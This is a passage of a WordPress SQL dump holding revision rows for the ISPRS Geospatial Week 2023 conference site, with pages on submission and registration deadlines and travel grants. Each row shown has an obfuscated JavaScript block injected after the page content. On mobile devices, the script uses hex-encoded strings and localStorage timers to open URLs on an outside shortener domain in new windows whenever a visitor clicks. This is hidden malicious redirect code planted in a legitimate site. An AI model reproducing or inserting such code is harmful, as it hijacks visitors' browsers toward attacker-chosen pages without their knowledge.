ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-02-02 10:25:05','2023-02-02 10:25:05','',2659,'https://gsw2023.com/?p=3720',0,'revision','',0),
(3721,1,'2023-02-02 10:25:29','2023-02-02 10:25:29','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: red;\"><span style=\"font-size: 18pt;\"><strong>ISPRS Geospatial Week: 2-7 September 2023</strong></span></h5>\n<h1><b><span style=\"font-size: 18pt;\">Important Dates:</span><u></u><u></u></b></h1>\n<h4>1. Annals (Fully Reviewed Papers):</h4>\n<ul>\n<li>\n<h6><strong>Full paper submission (Annals): March 31, 2023 (hard deadline, no extension)</strong></h6>\n</li>\n<li>\n<h6><strong>Full paper Author notification: May 1, 2023</strong></h6>\n</li>\n<li>\n<h6><strong>Camera ready paper submission: June 1, 2023</strong></h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h4>2. Archives (Abstract Reviewed Papers):</h4>\n<ul>\n<li>\n<h6>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</h6>\n</li>\n<li>\n<h6>Abstracts Author notification: May 15, 2023</h6>\n</li>\n<li>\n<h6>Camera ready paper submission: June 1, 2023</h6>\n</li>\n</ul>\n<p>&nbsp;</p>\n<h4><b>Registration deadlines</b></h4>\n<ul>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpFirst\">\n<h6><strong>Early bird registration deadline: May 1, 2023</strong></h6>\n</li>\n<li class=\"m_7392195451776563107MsoListParagraphCxSpLast\">\n<h6><strong>Late registration deadline: July 1, 2023</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-02-02 10:25:29','2023-02-02 10:25:29','',2654,'https://gsw2023.com/?p=3721',0,'revision','',0),
(3722,1,'2023-02-02 10:38:02','2023-02-02 10:38:02','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h4 class=\"three_quarter first\"><strong>The</strong> <strong><a href=\"http://www.isprs.org/foundation/Default.aspx\" data-saferedirecturl=\"https://www.google.com/url?q=http://www.isprs.org/foundation/Default.aspx&amp;source=gmail&amp;ust=1675404345029000&amp;usg=AOvVaw2DdHpz5ihNqqTyfv-q8_ze\">ISPRS Foundation</a></strong> <strong>provides travel grants to enable young authors, distinguished speakers, and officially designated Delegates, especially from developing countries, to participate in ISPRS sponsored events and in forums promoting international cooperation, advancements and benefits of the P&amp;RS&amp;SI sciences.</strong></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<ul style=\"font-weight: 400;\">\n<li><strong>Click</strong> <strong><a href=\"http://www.isprs.org/foundation/forms/Travel_Grants.aspx\" data-saferedirecturl=\"https://www.google.com/url?q=http://www.isprs.org/foundation/forms/Travel_Grants.aspx&amp;source=gmail&amp;ust=1675404345029000&amp;usg=AOvVaw19PJGKqfwxDGKh2VuKF0d6\">here</a></strong> <strong>to complete your travel grant application online</strong></li>\n</ul>\n<h5 style=\"font-weight: 400;\"></h5>\n<h4 style=\"font-weight: 400;\"><strong>Important Dates</strong></h4>\n<ul>\n<li style=\"list-style-type: none;\">\n<ul>\n<li style=\"list-style-type: none;\">\n<ul style=\"font-weight: 400;\">\n<li>\n<h4>Applications for travel grants “live” on TIF website: March 15, 2023</h4>\n</li>\n<li>\n<h4>Deadline for submission of travel grant applications: May 18, 2023</h4>\n</li>\n<li>\n<h4>Decision &amp; notification of successful applicants: June 3, 2023</h4>\n</li>\n<li>\n<h4>Notification of acceptance of travel grant to TIF: July 3, 2023</h4>\n</li>\n</ul>\n</li>\n</ul>\n</li>\n</ul>\n<h4 class=\"gap-50\"></h4>\n<h4 id=\"respond\"></h4>\n<p>[/bsf-info-box][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 